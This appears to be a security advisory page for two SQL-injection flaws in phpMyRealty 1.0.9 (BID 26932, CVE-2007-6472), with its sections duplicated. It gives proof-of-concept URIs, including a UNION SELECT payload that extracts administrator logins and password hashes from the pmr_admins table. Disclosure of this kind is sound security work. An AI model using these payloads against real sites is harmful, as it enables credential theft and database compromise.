phpMyRealty Multiple SQL Injection Vulnerabilities
BID:26932
Info
phpMyRealty Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 26932 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6472 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 18 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | K0ller is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
phpMyRealty phpMyRealty 1.0.9 |
| Not Vulnerable: | |
Discussion
phpMyRealty Multiple SQL Injection Vulnerabilities
phpMyRealty (PMR) is prone to two SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpMyRealty v1.0.9 and prior versions are reported vulnerable.
phpMyRealty (PMR) is prone to two SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpMyRealty v1.0.9 and prior versions are reported vulnerable.
Exploit / POC
phpMyRealty Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available for these issues:
http://www.example.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_admins
http://www.example.com/admin/findlistings.php?listing_updated=YES&listing_updated_days=1)+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available for these issues:
http://www.example.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_admins
http://www.example.com/admin/findlistings.php?listing_updated=YES&listing_updated_days=1)+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
Solution / Fix
phpMyRealty Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].